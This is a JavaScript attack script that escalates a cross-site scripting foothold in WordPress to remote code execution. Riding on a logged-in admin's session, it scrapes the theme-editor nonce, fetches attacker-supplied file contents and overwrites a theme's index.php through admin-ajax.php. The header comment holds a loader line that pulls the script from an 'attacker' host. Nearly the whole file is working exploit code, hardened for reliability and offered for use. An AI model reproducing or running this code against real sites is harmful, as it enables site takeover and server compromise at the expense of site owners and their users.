/*
Escalate a WordPress XSS to RCE: from the victim's authenticated admin session, scrape the theme-editor nonce and overwrite a theme file with attacker-supplied content.
jQuery.getScript('https://attacker/wordpress_rce.js',function(){main()});
*/
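/*
 * XSS -> RCE escalation helper for WordPress.
 *
 * Every request rides on the VICTIM's cookies, so this only achieves anything
 * when the script runs in the browser of a user who is allowed to use the
 * theme editor. The chain is:
 *   1. GET /wp-admin/theme-editor.php and read the `#nonce` hidden field.
 *   2. GET the replacement file body from `payloadUrl`.
 *   3. POST action `edit-theme-plugin-file` to admin-ajax.php, overwriting
 *      `file` inside `theme` with that body.
 *
 * Depends on a page-global `jQuery`. The two GETs are deliberately synchronous
 * (`async: false`, deprecated since jQuery 1.8) so `run()` finishes in one
 * pass; the final POST is fire-and-forget, so `run()` returns before the
 * server has answered it.
 */
class RCE {
  /**
   * @param {Object} [opts]
   * @param {string} [opts.theme='catch-wheels'] theme slug passed to the editor.
   * @param {string} [opts.file='index.php'] file inside the theme to overwrite.
   * @param {string} [opts.payloadUrl='http://127.0.0.1/wordpress_rce.txt']
   *   where the new file body is fetched from. It must be reachable from the
   *   victim's browser and readable cross-origin; otherwise get_req() yields
   *   undefined and theme_update() refuses to run (see below).
   */
  constructor(opts = {}) {
    this.theme = opts.theme !== undefined ? opts.theme : 'catch-wheels';
    this.file = opts.file !== undefined ? opts.file : 'index.php';
    this.payloadUrl = opts.payloadUrl !== undefined ? opts.payloadUrl : 'http://127.0.0.1/wordpress_rce.txt';
  }

  /**
   * URL of the theme-editor page for the configured theme/file. Used both as
   * the page to scrape the nonce from and as the `_wp_http_referer` value
   * WordPress expects on the save request.
   * @returns {string}
   */
  editor_url() {
    return '/wp-admin/theme-editor.php?file=' + this.file + '&theme=' + this.theme;
  }

  /**
   * Synchronous GET of `url` in the victim's session.
   * @param {string} url
   * @returns {string|undefined} response body as text, or undefined if the
   *   request failed (logged, not thrown, so callers can bail cleanly).
   */
  get_req(url) {
    let text;
    jQuery.ajax({
      type: 'GET',
      url: url,
      // jQuery option names are case-sensitive: the original `datatype` was
      // silently ignored and the response type was guessed from Content-Type.
      dataType: 'text',
      async: false,
      success: function (data) {
        text = data;
      },
      error: function (xhr, status) {
        console.error('get_req failed for ' + url + ': ' + status + ' (HTTP ' + (xhr && xhr.status) + ')');
      },
    });
    return text;
  }

  /**
   * Save `file` (the NEW file body) over `this.file` in `this.theme` through
   * the theme editor's AJAX endpoint.
   *
   * Refuses to post when the body is missing or empty: jQuery would serialise
   * `undefined`/`''` as `newcontent=`, which blanks the theme file and breaks
   * the target without planting anything.
   *
   * @param {string} file replacement file contents.
   * @param {string} csrf `nonce` value scraped from theme-editor.php.
   */
  theme_update(file, csrf) {
    if (!file) {
      console.error('theme_update: no payload body, refusing to blank ' + this.theme + '/' + this.file);
      return;
    }
    const theme = this.theme;
    const target = this.file;
    jQuery.ajax({
      type: 'POST',
      url: '/wp-admin/admin-ajax.php?_fs_blog_admin=true',
      data: {
        newcontent: file,
        _wp_http_referer: this.editor_url(),
        nonce: csrf,
        action: 'edit-theme-plugin-file',
        file: target,
        theme: theme,
        'docs-list': '',
      },
      success: function () {
        console.log('uploaded');
      },
      error: function (xhr, status) {
        console.error('theme_update failed for ' + theme + '/' + target + ': ' + status + ' (HTTP ' + (xhr && xhr.status) + ')');
      },
      contentType: 'application/x-www-form-urlencoded',
    });
  }

  /**
   * Fetch the payload body from `this.payloadUrl` and push it through
   * theme_update() with the given nonce.
   * @param {string} csrf theme-editor nonce.
   */
  boom_p1(csrf) {
    const payload = this.get_req(this.payloadUrl);
    this.theme_update(payload, csrf);
  }

  /**
   * Load the theme-editor page in the victim's session and scrape the
   * `#nonce` hidden input.
   * @returns {string|undefined} the nonce, or undefined if the page could not
   *   be fetched or contains no such field (e.g. the victim lacks the rights
   *   to edit themes — confirm against the target).
   */
  get_nonce() {
    const html = this.get_req(this.editor_url());
    if (html === undefined) {
      return undefined;
    }
    // Parsing only; nothing is inserted into the DOM, so scripts in the
    // fetched page are not executed here.
    return jQuery(html).find('#nonce').val();
  }

  /** Full chain: nonce -> payload -> theme-file overwrite. */
  run() {
    const nonce = this.get_nonce();
    console.log(nonce);
    if (!nonce) {
      // Without a nonce WordPress rejects the save; don't fire a doomed POST.
      console.error('run: no theme-editor nonce, aborting');
      return;
    }
    this.boom_p1(nonce);
  }
}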
/* Entry point; invoked from the getScript() callback shown in the header comment. */
function main() {
  new RCE().run();
}